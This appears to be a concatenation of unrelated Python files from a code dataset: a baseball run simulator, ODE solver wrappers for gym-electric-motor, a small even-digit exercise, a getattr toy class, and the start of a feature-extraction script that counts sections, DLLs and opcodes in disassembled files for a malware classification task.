# An earlier lineup, kept for reference as an (unused) string literal.
'''
#1B , 2B , 3B , HR , SO , BO
players =[Player([0.7, 0.3, 0.0, 0.0, 0.0, 0.0]),
Player([0.5, 0.0, 0.0, 0.0, 0.0, 0.5]),
Player([0.5, 0.5, 0.0, 0.0, 0.0, 0.0]),
Player([0.4, 0.0, 0.0, 0.0, 0.0, 0.6]),
Player([0.5, 0.5, 0.0, 0.0, 0.0, 0.0]),
Player([0.6, 0.4, 0.0, 0.0, 0.0, 0.0]),
Player([0.4, 0.0, 0.0, 0.0, 0.0, 0.6]),
Player([0.8, 0.0, 0.0, 0.0, 0.0, 0.2]),
Player([0.5, 0.5, 0.0, 0.0, 0.0, 0.0]),
Player([0.7, 0.3, 0.0, 0.0, 0.0, 0.0])]
'''
# Active lineup: each Player takes [p1b, p2b, p3b, phr, pso, pbo].
players =[Player([0.5, 0.0, 0.0, 0.0, 0.0, 0.5]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0]),
Player([0.5, 0.0, 0.0, 0.0, 0.0, 0.5]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0]),
Player([0.5, 0.0, 0.0, 0.0, 0.0, 0.5]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0])]
#
#
# for sim_runs in range(0,1000):
# runs = 0
# inning = 1
# current_batter = 0
# bases = [0,0,0] #b1, b2, b3
# outs = 0
# start_runs = 0
#
# while inning <= MAX_INNINGS:
# batting = True
# result = players[current_batter % len(players)].get_hit()
# current_batter = current_batter + 1
# if (result == 'pbo') or (result == 'pso'):
# outs = outs + 1
# if (outs == 3):
# #max outs advance inning
# df.loc[sim_runs*MAX_INNINGS + inning] = (inning, runs, outs, runs - start_runs)
# inning = inning + 1
# bases = [0,0,0]
# outs = 0
# start_runs = runs
# elif (result == 'pbo'):
# if (bases[2]):
# runs = runs + 1
# bases[2] = bases[1]
# bases[1] = bases[0]
# bases[0] = 0
# #max runs advance inning
# if ((runs - start_runs)%MAX_RUNS == 0):
# df.loc[sim_runs*MAX_INNINGS + inning] = (inning, runs, outs, runs - start_runs)
# inning = inning + 1
# bases = [0,0,0]
# outs = 0
# start_runs = runs
# else:
# bases[2] = bases[1]
# bases[1] = bases[0]
# bases[0] = 0
# elif (result == 'p1b'):
# if (bases[2]):
# runs = runs + 1
# bases[2] = bases[1]
# bases[1] = bases[0]
# bases[0] = 1
# #max runs advance inning
# if ((runs - start_runs)%MAX_RUNS == 0):
# df.loc[sim_runs*MAX_INNINGS + inning] = (inning, runs, outs, runs - start_runs)
# inning = inning + 1
# bases = [0,0,0]
# outs = 0
# start_runs = runs
# else:
# bases[2] = bases[1]
# bases[1] = bases[0]
# bases[0] = 1
# elif (result == 'p2b'):
# if (bases[2] or bases[1]):
# runs = min(runs + bases[2] + bases[1],start_runs + MAX_RUNS)
# bases[2] = bases[0]
# bases[1] = 1
# bases[0] = 0
# #max runs advance inning
# if ((runs - start_runs)%MAX_RUNS == 0):
# df.loc[sim_runs*MAX_INNINGS + inning] = (inning, runs, outs, runs - start_runs)
# inning = inning + 1
# bases = [0,0,0]
# outs = 0
# start_runs = runs
# else:
# bases[2] = bases[0]
# bases[1] = 1
# bases[0] = 0
# elif (result == 'p3b'):
# if (bases[2] or bases[1] or bases[0]):
# runs = min(runs + bases[2] + bases[1] + bases[0],start_runs + MAX_RUNS)
# bases[2] = 1
# bases[1] = 0
# bases[0] = 0
# #max runs advance inning
# if ((runs - start_runs)%MAX_RUNS == 0):
# df.loc[sim_runs*MAX_INNINGS + inning] = (inning, runs, outs, runs - start_runs)
# inning = inning + 1
# bases = [0,0,0]
# outs = 0
# start_runs = runs
# else:
# bases[2] = 1
# bases[1] = 0
# bases[0] = 0
# elif (result == 'phr'):
# runs = min(runs + bases[2] + bases[1] + bases[0] + 1,start_runs + MAX_RUNS)
# bases[2] = 0
# bases[1] = 0
# bases[0] = 0
# #max runs advance inning
# if ((runs - start_runs)%MAX_RUNS == 0):
# df.loc[sim_runs*MAX_INNINGS + inning] = (inning, runs, outs, runs - start_runs)
# inning = inning + 1
# bases = [0,0,0]
# outs = 0
# start_runs = runs
# %matplotlib notebook
# ax = df[df.Inning == 4]['Runs'].hist()
# ax.set_xlabel('Number of Runs')
# ax.set_title('Histogram of Number of Runs over Four Innings (1000 Monte Carlo Runs)')
# print(df[df.Inning == 4]['Runs'].sum()/df[df.Inning == 4]['Runs'].count())
# In[21]:
class BaseBallAction(Enum):
    """Possible outcomes of a single plate appearance."""
    Single = 1
    Double = 2
    Triple = 3
    HomeRun = 4
    StrikeOut = 5
    ThrownOut = 6  # ball put in play but the batter is thrown out at first
class BaseballState():
    """Snapshot of a game: inning, score, outs, base occupancy (0/1 flags), and
    the probability (`likelihood`) of reaching this exact state."""

    def __init__(self, inning, runs, outs, base3, base2, base1, inning_start_runs = 0.0, likelihood = 1.0):
        self.inning = inning
        self.runs = runs
        # Score when the current inning began; used to enforce MAX_RUNS per inning.
        self.inning_start_runs = inning_start_runs
        self.outs = outs
        self.base3 = base3
        self.base2 = base2
        self.base1 = base1
        self.likelihood = likelihood

    def __repr__(self):
        return "Inning: {}, Runs: {}, Inning Start Runs: {}, \n Outs: {}, First: {}, Second: {}, Third: {}, \n Likelihood: {}".format(self.inning, self.runs, self.inning_start_runs, self.outs, self.base1, self.base2, self.base3, self.likelihood)

    def reset_bases(self):
        """Clear all three bases."""
        self.base1 = 0
        self.base2 = 0
        self.base3 = 0

    def increment_inning(self):
        """Advance to the next inning: clear bases, reset outs, and record the
        current score as the new inning's starting score."""
        self.inning = self.inning + 1
        self.reset_bases()
        self.outs = 0
        self.inning_start_runs = self.runs

    def advance_bases(self, count, new_runner):
        """Shift every runner forward `count` bases, scoring from third.

        `new_runner` is 1 if the batter reaches first on the first shift, 0
        otherwise. If the per-inning run cap is reached mid-advance, the inning
        ends and the remaining shifts are abandoned.
        """
        while(count != 0):
            if (self.base3):
                self.runs = self.runs + 1
                self.base3 = self.base2
                self.base2 = self.base1
                self.base1 = new_runner
                #max runs advance inning
                if ((self.runs - self.inning_start_runs)%MAX_RUNS == 0):
                    self.increment_inning()
                    break
            else:
                self.base3 = self.base2
                self.base2 = self.base1
                self.base1 = new_runner
            new_runner = 0 #only new runner first time through
            count = count - 1

    def next_state(self,action, action_probability):
        """Return a deep-copied successor state after `action`, with this
        branch's probability multiplied into the likelihood."""
        new_state = deepcopy(self)
        new_state.likelihood = new_state.likelihood*action_probability
        if (action == BaseBallAction.StrikeOut) or (action == BaseBallAction.ThrownOut):
            new_state.outs = new_state.outs + 1
            if (new_state.outs == 3):
                #max outs advance inning
                new_state.increment_inning()
            elif (action == BaseBallAction.ThrownOut): #don't always advance base but will here...also usually throw to first
                new_state.advance_bases(count = 1, new_runner = 0)
        elif (action == BaseBallAction.Single):
            new_state.advance_bases(count = 1, new_runner = 1)
        elif (action == BaseBallAction.Double):
            new_state.advance_bases(count = 2, new_runner = 1)
        elif (action == BaseBallAction.Triple):
            new_state.advance_bases(count = 3, new_runner = 1)
        elif (action == BaseBallAction.HomeRun):
            new_state.advance_bases(count = 4, new_runner = 1)
        return new_state
# In[ ]:
#start_state = BaseballState(1,0,0,0,0,0)
#current_player_idx = 0
#Loop over all the players and fill out the multi-hypothesis likelihoods
# states = [start_state]
# final_states = []
# num_iter = 0
# while(1):
# num_iter = num_iter+1
# num_old_states = len(states)
# print("{} Len Old States {}, Len of Final States {}".format(num_iter, num_old_states,len(final_states)))
# current_player = players[current_player_idx%len(players)]
# for cur_state_idx in range(0,num_old_states):
# cur_state = states[cur_state_idx]
# if(current_player.p1b > 0.0):
# new_state = cur_state.next_state(BaseBallAction.Single, current_player.p1b)
# if(new_state.inning > MAX_INNINGS):
# final_states.append(new_state)
# else:
# states.append(new_state)
# if(current_player.p2b > 0.0):
# new_state = cur_state.next_state(BaseBallAction.Double, current_player.p2b)
# if(new_state.inning > MAX_INNINGS):
# final_states.append(new_state)
# else:
# states.append(new_state)
# if(current_player.p3b > 0.0):
# new_state = cur_state.next_state(BaseBallAction.Triple, current_player.p3b)
# if(new_state.inning > MAX_INNINGS):
# final_states.append(new_state)
# else:
# states.append(new_state)
# if(current_player.phr > 0.0):
# new_state = cur_state.next_state(BaseBallAction.HomeRun, current_player.phr)
# if(new_state.inning > MAX_INNINGS):
# final_states.append(new_state)
# else:
# states.append(new_state)
# if(current_player.pso > 0.0):
# new_state = cur_state.next_state(BaseBallAction.StrikeOut, current_player.pso)
# if(new_state.inning > MAX_INNINGS):
# final_states.append(new_state)
# else:
# states.append(new_state)
# if(current_player.pbo > 0.0):
# new_state = cur_state.next_state(BaseBallAction.ThrownOut, current_player.pbo)
# if(new_state.inning > MAX_INNINGS):
# final_states.append(new_state)
# else:
# states.append(new_state)
# del states[0:num_old_states]
# if(len(states) == 0):
# break
# current_player_idx = current_player_idx + 1
#f= open("final_states.csv","w+")
#final_states = 0
def test():
    """Exhaustively expand the full probability tree of a game for the global
    `players` lineup, then print the run distribution and the expected runs."""
    # runs[r] accumulates the probability of finishing the game with r runs.
    runs = [0.0 for i in range(0,21)]

    def run_next_iter(cur_state, player_idx, baseball_action, probability):
        # Branch into the successor state; record terminal states, else recurse.
        new_state = cur_state.next_state(baseball_action, probability)
        if(new_state.inning > MAX_INNINGS):
            runs[new_state.runs] = runs[new_state.runs] + new_state.likelihood
        else:
            run_next_player(new_state,(player_idx + 1)%len(players))

    def run_next_player(cur_state, player_idx, do_print = False):
        # Expand every outcome with non-zero probability for the batter due up.
        current_player = players[player_idx%len(players)]
        if(current_player.p1b > 0.0):
            if(do_print):
                print('First Base Hit')
            run_next_iter(cur_state,player_idx,BaseBallAction.Single, current_player.p1b)
        if(current_player.p2b > 0.0):
            if(do_print):
                print('Second Base Hit')
            run_next_iter(cur_state,player_idx,BaseBallAction.Double, current_player.p2b)
        if(current_player.p3b > 0.0):
            if(do_print):
                print('Third Base Hit')
            run_next_iter(cur_state,player_idx,BaseBallAction.Triple, current_player.p3b)
        if(current_player.phr > 0.0):
            if(do_print):
                print('Home Run Hit')
            run_next_iter(cur_state,player_idx,BaseBallAction.HomeRun, current_player.phr)
        if(current_player.pso > 0.0):
            if(do_print):
                print('Strike Out')
            run_next_iter(cur_state,player_idx,BaseBallAction.StrikeOut, current_player.pso)
        if(current_player.pbo > 0.0):
            if(do_print):
                print('Thrown Out')
            run_next_iter(cur_state,player_idx,BaseBallAction.ThrownOut, current_player.pbo)

    # Start at inning 1, no runs/outs, bases empty; print the first batter's branches.
    start_state = BaseballState(1,0,0,0,0,0)
    state_player_idx = 0
    run_next_player(start_state, state_player_idx, True)
    print(runs)
    # Expected runs = sum over r of r * P(r).
    w_sum = 0
    for idx, val in enumerate(runs):
        w_sum = w_sum + val*idx
    print(w_sum)
| true |
03a63783eb51e04ad19fa1d4ed6ef4537a836694 | Python | upb-lea/gym-electric-motor | /gym_electric_motor/physical_systems/solvers.py | UTF-8 | 7,407 | 3.390625 | 3 | [
"MIT"
] | permissive | from scipy.integrate import ode, solve_ivp, odeint
class OdeSolver:
    """
    Interface and base class for all used OdeSolvers in gym-electric-motor.
    """

    #: Current system time t
    _t = 0
    #: Current system state y
    _y = None
    #: Function parameters that are passed to the system equation and the system jacobian additionally to t and y
    _f_params = None
    #: System equation in the form: _system_equation(t, y, *f_params)
    _system_equation = None
    #: System jacobian in the form _system_jacobian(t,y, *f_params)
    _system_jacobian = None

    @property
    def t(self):
        """
        Returns:
            float: Current system time t
        """
        return self._t

    @property
    def y(self):
        """
        Returns:
            float: Current system state y
        """
        return self._y

    def set_initial_value(self, initial_value, t=0):
        """
        Set the new initial system state after reset.

        Args:
            initial_value(numpy.ndarray(float)): Initial system state
            t(float): Initial system time
        """
        # NOTE(review): the state is stored by reference, not copied; callers
        # must not mutate `initial_value` afterwards.
        self._y = initial_value
        self._t = t

    def integrate(self, t):
        """
        Integrate the ODE-System from current time until time t

        Args:
            t(float): Time until the system shall be integrated

        Returns:
            ndarray(float): New system state at time t
        """
        raise NotImplementedError

    def set_system_equation(self, system_equation, jac=None):
        """
        Setting of the systems equation.

        Args:
            system_equation(function_pointer): Pointer to the systems equation with the parameters (t, y, *args)
            jac(function_pointer): Pointer to the systems jacobian with the parameters (t, y, *args)
        """
        self._system_equation = system_equation
        self._system_jacobian = jac

    def set_f_params(self, *args):
        """
        Set further arguments for the systems function call like input quantities.

        Args:
            args(list): Additional arguments for the next function calls.
        """
        self._f_params = args
class EulerSolver(OdeSolver):
    """
    Solves a system of differential equations of first order for a given time step with linear approximation.

    .. math:
        x^\prime(t) = f(x(t))

    .. math:
        x(t + \\frac{\\tau}{nsteps}) = x(t) + x^\prime(t) * \\frac{\\tau}{nsteps}
    """
    def __init__(self, nsteps=1):
        """
        Args:
            nsteps(int): Number of cycles to calculate for each iteration. Higher steps make the system more accurate,
                but take also longer to compute.
        """
        self._nsteps = nsteps
        # Bind the cheaper single-step routine when only one substep is requested.
        self._integrate = self._integrate_one_step if nsteps == 1 else self._integrate_nsteps

    def integrate(self, t):
        # Docstring of superclass
        return self._integrate(t)

    def _integrate_nsteps(self, t):
        """
        Integration method for nsteps > 1

        Args:
            t(float): Time until the system shall be calculated

        Returns:
            ndarray(float): The new state of the system.
        """
        tau = (t - self._t) / self._nsteps
        state = self._y
        # Bugfix: the substeps must start at the *current* time self._t (not at
        # the target time t) and the derivative must be evaluated at the current
        # substep time (forward Euler). This makes the multi-step path consistent
        # with _integrate_one_step and with the formula in the class docstring;
        # previously the equation was evaluated at current_t + tau starting from t.
        current_t = self._t
        for _ in range(self._nsteps):
            delta = self._system_equation(current_t, state, *self._f_params) * tau
            state = state + delta
            current_t += tau
        self._y = state
        self._t = t
        return self._y

    def _integrate_one_step(self, t):
        """
        Integration method for nsteps = 1. (For faster computation)

        Args:
            t(float): Time until the system shall be calculated

        Returns:
            ndarray(float): The new state of the system.
        """
        # Single forward-Euler step: y(t) = y(t0) + f(t0, y(t0)) * (t - t0)
        self._y = self._y + self._system_equation(self._t, self._y, *self._f_params) * (t - self._t)
        self._t = t
        return self._y
class ScipyOdeSolver(OdeSolver):
    """
    Wrapper class for all ode-solvers in the scipy.integrate.ode package.

    https://docs.scipy.org/doc/scipy/reference/generated/scipy.integrate.ode.html
    """
    #: Integrator object
    _ode = None
    @property
    def t(self):
        # Time is tracked by the wrapped scipy integrator, not by the base class.
        return self._ode.t
    @property
    def y(self):
        # State is tracked by the wrapped scipy integrator, not by the base class.
        return self._ode.y
    def __init__(self, integrator='dopri5', **kwargs):
        """
        Args:
            integrator(str): String to choose the integrator from the scipy.integrate.ode
            kwargs(dict): All parameters that can be set in the "set_integrator"-method of scipy.integrate.ode
        """
        # NOTE(review): self._solver appears to be unused in this class.
        self._solver = None
        self._solver_args = kwargs
        self._integrator = integrator
    def set_system_equation(self, system_equation, jac=None):
        # Docstring of superclass
        super().set_system_equation(system_equation, jac)
        # The scipy integrator object can only be created once the system equation
        # is known; set_system_equation must therefore be called before
        # set_initial_value / set_f_params / integrate (self._ode is None until then).
        self._ode = ode(system_equation, jac).set_integrator(self._integrator, **self._solver_args)
    def set_initial_value(self, initial_value, t=0):
        # Docstring of superclass
        self._ode.set_initial_value(initial_value, t)
    def set_f_params(self, *args):
        # Docstring of superclass
        super().set_f_params(*args)
        # Forward the parameters to both the system equation and the jacobian.
        self._ode.set_f_params(*args)
        self._ode.set_jac_params(*args)
    def integrate(self, t):
        # Docstring of superclass
        return self._ode.integrate(t)
class ScipySolveIvpSolver(OdeSolver):
    """
    Wrapper class for all ode-solvers in the scipy.integrate.solve_ivp function

    https://docs.scipy.org/doc/scipy/reference/generated/scipy.integrate.solve_ivp.html
    """

    def __init__(self, **kwargs):
        # Keyword arguments forwarded to scipy.integrate.solve_ivp on every call.
        self._solver_kwargs = kwargs

    def set_system_equation(self, system_equation, jac=None):
        # Docstring of superclass
        super().set_system_equation(system_equation, jac)
        # Only the implicit methods Radau, BDF and LSODA accept a jacobian.
        if self._solver_kwargs.get('method') in ('Radau', 'BDF', 'LSODA'):
            self._solver_kwargs['jac'] = self._system_jacobian

    def integrate(self, t):
        # Docstring of superclass
        # Integrate from the current time to t and evaluate the solution at t only.
        solution = solve_ivp(
            self._system_equation, [self._t, t], self._y, t_eval=[t],
            args=self._f_params, **self._solver_kwargs
        )
        self._t = t
        self._y = solution.y.T[-1]
        return self._y
class ScipyOdeIntSolver(OdeSolver):
    """
    Wrapper class for all ode-solvers in the scipy.integrate.odeint function.

    https://docs.scipy.org/doc/scipy/reference/generated/scipy.integrate.odeint.html
    """

    def __init__(self, **kwargs):
        """
        Args:
            kwargs(dict): Arguments to pass to the solver. See the scipy description for further information.
        """
        self._solver_args = kwargs

    def integrate(self, t):
        # Docstring of superclass
        # odeint returns one state row per requested time point; the last row
        # belongs to t and becomes the new current state.
        trajectory = odeint(
            self._system_equation, self._y, [self._t, t],
            args=self._f_params, Dfun=self._system_jacobian,
            tfirst=True, **self._solver_args
        )
        self._t = t
        self._y = trajectory[-1]
        return self._y
| true |
0789827c056b4b093c80a5bb2afd1b79b4fbf777 | Python | mayankt90/Python100QuesChallenge | /Day3.3.py | UTF-8 | 1,018 | 4.34375 | 4 | [] | no_license | # Write a program, which will find all such numbers between 1000 and 3000 (both included) such that each digit of the number is an even number.The numbers obtained should be printed in a comma-separated sequence on a single line.
# All even numbers in [1000, 3000], printed comma-separated on one line.
evens = [str(number) for number in range(1000, 3001, 2)]
print(",".join(evens))
print()
# Every digit Problem: keep only numbers whose four digits are all even.
all_even_digits = [text for text in (str(number) for number in range(1000, 3001))
                   if int(text[0]) % 2 == 0 and int(text[1]) % 2 == 0
                   and int(text[2]) % 2 == 0 and int(text[3]) % 2 == 0]
print(','.join(all_even_digits))
# or: the ASCII code of a digit character has the same parity as the digit
# itself ('0' is 48, '1' is 49, ...), so ord(ch) % 2 == 0 tests "digit is even".
digit_parity = [str(number) for number in range(1000, 3001)
                if all(ord(ch) % 2 == 0 for ch in str(number))]
print(",".join(digit_parity))
| true |
b517dfd48b1dfd96ee5d3e05719f28c9dd64fe0d | Python | zeronezer/pydemo | /购物车/aa.py | UTF-8 | 165 | 2.671875 | 3 | [] | no_license | class a:
"""docstring for a"""
	def __init__(self, arg):
		# Remember the constructor argument; b() prints it next to its own argument.
		self.arg = arg
	def b(self,name):
		# Print the stored constructor argument followed by ``name``.
		print (self.arg,name)
qq=input('>>:').strip()
# Look up the attribute named by the user's input on a fresh instance a(1) and
# call it with argument 2 -- e.g. typing ``b`` invokes a(1).b(2).
getattr(a(1),qq)(2)
50cefff394ef5355637a1e9cb5f1d538b4e2d8d8 | Python | mcvenkat/Python-Programs | /_fast_feature_extraction.py | UTF-8 | 27,279 | 2.65625 | 3 | [
"MIT",
"CC0-1.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ######################################################
# _fast_feature_extraction.py
# author: Gert Jacobusse, gert.jacobusse@rogatio.nl
# licence: FreeBSD
"""
Copyright (c) 2015, Gert Jacobusse
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
OF THE POSSIBILITY OF SUCH DAMAGE.
"""
# required directory structure:
# > feature_extraction.py
# > trainLabels.csv
# > sampleSubmission.csv
# train> (all train files)
# test> (all test files)
######################################################
# import dependencies
import os
import csv
import zipfile
from io import BytesIO
from collections import defaultdict
import re
import numpy as np
######################################################
# list ids and labels
# Ids and class labels of the train set, aligned by index.
trainids=[]
labels=[]
with open('trainLabels.csv','r') as f:
    r=csv.reader(f)
    # NOTE(review): reader.next() is Python-2 only; next(r) would work on both.
    r.next() # skip header
    for row in r:
        trainids.append(row[0])
        labels.append(float(row[1]))
# Ids of the test set, taken from the sample submission file.
testids=[]
with open('sampleSubmission.csv','r') as f:
    r=csv.reader(f)
    r.next()
    for row in r:
        testids.append(row[0])
######################################################
# general functions
def readdata(fname,header=True,selectedcols=None):
    """Read a numeric csv file.

    Args:
        fname: path of the csv file to read.
        header: whether the first row contains column names.
        selectedcols: optional collection of column names to keep; requires
            header=True so that names are known.

    Returns:
        (data, names): data is a list of rows of floats; names is the list of
        (selected) column names, or None when header is False.
    """
    with open(fname,'r') as f:
        r=csv.reader(f)
        # next(r) works on both Python 2.6+ and Python 3
        # (the previous r.next() was Python-2 only)
        names = next(r) if header else None
        if selectedcols:
            # column selection only makes sense when the names are known
            assert header==True
            data = [[float(e) for i,e in enumerate(row) if names[i] in selectedcols] for row in r]
            names = [name for name in names if name in selectedcols]
        else:
            data = [[float(e) for e in row] for row in r]
    return data,names
def writedata(data,fname,header=None):
    """Write rows of values to *fname* as csv, optionally preceded by a header row."""
    with open(fname,'w') as out:
        writer = csv.writer(out)
        if header:
            writer.writerow(header)
        writer.writerows(data)
######################################################
# extract file properties
"""
function getcompressedsize
input: path to file
output: compressed size of file
* read file and compress it in memory
"""
def getcompressedsize(fpath):
    """Compress the file at *fpath* in memory and return its deflated size in bytes (float)."""
    buffer = BytesIO()
    archive = zipfile.ZipFile(buffer, 'w')
    archive.write(fpath, compress_type=zipfile.ZIP_DEFLATED)
    compressed = float(archive.infolist()[0].compress_size)
    archive.close()
    return compressed
"""
function writefileprops
input: ids of trainset or testset, string "train" or "test"
output: writes train_fileprops or test_fileprops
* extract file properties (size, compressed size, ratios) from all files in train or test set
"""
def writefileprops(ids,trainortest):
    # Extract cheap file-level features (raw size, in-memory compressed size
    # and their ratios) for every sample and write one row per id to
    # <trainortest>_fileprops.csv.
    with open('%s_fileprops.csv'%trainortest,'w') as f:
        w=csv.writer(f)
        w.writerow(['asmSize','bytesSize',
            'asmCompressionRate','bytesCompressionRate',
            'ab_ratio','abc_ratio','ab2abc_ratio'])
        for i in ids:
            # raw sizes of the disassembly (.asm) and the raw byte dump (.bytes)
            asmsiz=float(os.path.getsize('%s/'%trainortest+i+'.asm'))
            bytsiz=float(os.path.getsize('%s/'%trainortest+i+'.bytes'))
            # compression rate = compressed size / raw size (lower = more redundant)
            asmcr=getcompressedsize('%s/'%trainortest+i+'.asm')/asmsiz
            bytcr=getcompressedsize('%s/'%trainortest+i+'.bytes')/bytsiz
            ab=asmsiz/bytsiz
            abc=asmcr/bytcr
            w.writerow([asmsiz,bytsiz,asmcr,bytcr,ab,abc,ab/abc])
            # flush after every row so progress survives an interruption
            f.flush()
######################################################
# extract asm contents
"""
the following three selections (on sections, dlls and opcodes) can be verified by looking
at the metadata files that are written during feature extraction. They are added here to
illustrate what the features mean, and to make the code more readible
"""
# sections that occur in at least 5 files from the trainset:
selsections=['.2', '.3', '.CRT', '.Lax503', '.Much', '.Pav', '.RDATA', '.Racy',
'.Re82', '.Reel', '.Sty', '.Tls', '.adata', '.bas', '.bas0', '.brick',
'.bss', '.code', '.cud', '.data', '.data1', '.edata', '.gnu_deb', '.hdata',
'.icode', '.idata', '.laor', '.ndata', '.orpc', '.pdata', '.rata', '.rdat',
'.rdata', '.reloc', '.rsrc', '.sdbid', '.sforce3', '.text', '.text1', '.tls',
'.xdata', '.zenc', 'BSS', 'CODE', 'DATA', 'GAP', 'HEADER', 'Hc%37c',
'JFsX_', 'UPX0', 'UPX1', 'Xd_?_mf', '_0', '_1', '_2', '_3',
'_4', '_5', 'bss', 'code', 'seg000', 'seg001', 'seg002', 'seg003',
'seg004']
# dlls that occur in at least 30 files from the trainset:
seldlls=['', '*', '2', '32', 'advapi32', 'advpack', 'api', 'apphelp',
'avicap32', 'clbcatq', 'comctl32', 'comdlg32', 'crypt32', 'dbghelp', 'dpnet', 'dsound',
'e', 'gdi32', 'gdiplus', 'imm32', 'iphlpapi', 'kernel32', 'libgcj_s', 'libvlccore',
'mapi32', 'mfc42', 'mlang', 'mpr', 'msasn1', 'mscms', 'mscoree', 'msdart',
'msi', 'msimg32', 'msvcp60', 'msvcp71', 'msvcp80', 'msvcr71', 'msvcr80', 'msvcr90',
'msvcrt', 'msvfw32', 'netapi32', 'ntdll', 'ntdsapi', 'ntmarta', 'ntshrui', 'ole32',
'oleacc', 'oleaut32', 'oledlg', 'opengl32', 'psapi', 'rasapi32', 'riched20', 'riched32',
'rnel32', 'rpcrt4', 'rsaenh', 'secur32', 'security', 'sensapi', 'setupapi', 'shell32',
'shfolder', 'shlwapi', 'tapi32', 'unicows', 'urlmon', 'user32', 'usp10', 'uxtheme',
'version', 'wab32', 'wininet', 'winmm', 'wintrust', 'wldap32', 'ws2_32', 'wsock32',
'xprt5']
# opcodes that occur in at least 30 files from the trainset:
selopcs=['aad', 'aam', 'adc', 'add', 'addpd', 'addps', 'addsd', 'align',
'and', 'andnps', 'andpd', 'andps', 'arpl', 'assume', 'bound', 'bsf',
'bsr', 'bswap', 'bt', 'btc', 'btr', 'bts', 'call', 'cmova',
'cmovb', 'cmovbe', 'cmovg', 'cmovge', 'cmovl', 'cmovle', 'cmovnb', 'cmovns',
'cmovnz', 'cmovs', 'cmovz', 'cmp', 'cmpeqsd', 'cmpltpd', 'cmps', 'cmpxchg',
'db', 'dd', 'dec', 'div', 'divsd', 'dq', 'dt', 'dw',
'end', 'endp', 'enter', 'fadd', 'faddp', 'fbld', 'fbstp', 'fcmovb',
'fcmovbe', 'fcmove', 'fcmovnb', 'fcmovnbe', 'fcmovne', 'fcmovnu', 'fcmovu', 'fcom',
'fcomi', 'fcomip', 'fcomp', 'fdiv', 'fdivp', 'fdivr', 'fdivrp', 'ffree',
'ffreep', 'fiadd', 'ficom', 'ficomp', 'fidiv', 'fidivr', 'fild', 'fimul',
'fist', 'fistp', 'fisttp', 'fisub', 'fisubr', 'fld', 'fldcw', 'fldenv',
'fmul', 'fmulp', 'fnsave', 'fnstcw', 'fnstenv', 'fnstsw', 'frstor', 'fsave',
'fst', 'fstcw', 'fstp', 'fstsw', 'fsub', 'fsubp', 'fsubr', 'fsubrp',
'fucom', 'fucomi', 'fucomip', 'fucomp', 'fxch', 'hnt', 'hostshort',
'ht', 'idiv', 'imul', 'in', 'inc', 'include', 'int', 'ja', 'jb', 'jbe',
'jecxz', 'jg', 'jge', 'jl', 'jle', 'jmp', 'jnb', 'jno', 'jnp', 'jns',
'jnz', 'jo', 'jp', 'js', 'jz', 'ldmxcsr', 'lds', 'lea', 'les', 'lock',
'lods', 'loop', 'loope', 'loopne', 'mov', 'movapd', 'movaps', 'movd',
'movdqa', 'movhps', 'movlpd', 'movlps', 'movq', 'movs', 'movsd', 'movss',
'movsx', 'movups', 'movzx', 'mul', 'mulpd', 'mulps', 'mulsd', 'neg',
'nop', 'not', 'offset', 'or', 'orpd', 'orps', 'out', 'outs', 'paddb',
'paddd', 'paddq', 'paddsb', 'paddsw', 'paddusb', 'paddusw', 'paddw',
'pand', 'pandn', 'pavgb', 'pcmpeqb', 'pcmpeqd', 'pcmpeqw', 'pcmpgtb',
'pcmpgtd', 'pcmpgtw', 'pextrw', 'piconinfo', 'pinsrw', 'pmaddwd',
'pmaxsw', 'pmulhw', 'pmullw', 'pop', 'por', 'pperrinfo', 'proc',
'pshufd', 'pshufw', 'pslld', 'psllq', 'psllw', 'psrad', 'psraw',
'psrld', 'psrlq', 'psrlw', 'psubb', 'psubd', 'psubq', 'psubsb',
'psubsw', 'psubusb', 'psubusw', 'psubw', 'public', 'punpckhbw',
'punpckhdq', 'punpckhwd', 'punpcklbw', 'punpckldq', 'punpcklwd',
'push', 'pxor', 'rcl', 'rcpps', 'rcr', 'rep', 'repe', 'repne',
'retf', 'retfw', 'retn', 'retnw', 'rgsabound', 'rol', 'ror', 'sal',
'sar', 'sbb', 'scas', 'segment', 'setb', 'setbe', 'setl', 'setle',
'setnb', 'setnbe', 'setnl', 'setnle', 'setns', 'setnz', 'seto',
'sets', 'setz', 'shl', 'shld', 'shr', 'shrd', 'shufps', 'sldt',
'stmxcsr', 'stos', 'sub', 'subpd', 'subps', 'subsd', 'test',
'ucomisd', 'unicode', 'xadd', 'xchg', 'xlat', 'xor', 'xorpd', 'xorps']
"""
function getsectioncounts
input: list of lines in an asm file
output: dictionary with number of lines in each section
* count number of lines in each section
"""
def getsectioncounts(asmlines):
    """Count how many lines belong to each section.

    The section name is taken as the text before the first ':' on each line;
    missing keys of the returned defaultdict read as 0.
    """
    sectioncounts = defaultdict(int)
    for line in asmlines:
        section = line.partition(':')[0]
        sectioncounts[section] += 1
    return sectioncounts
"""
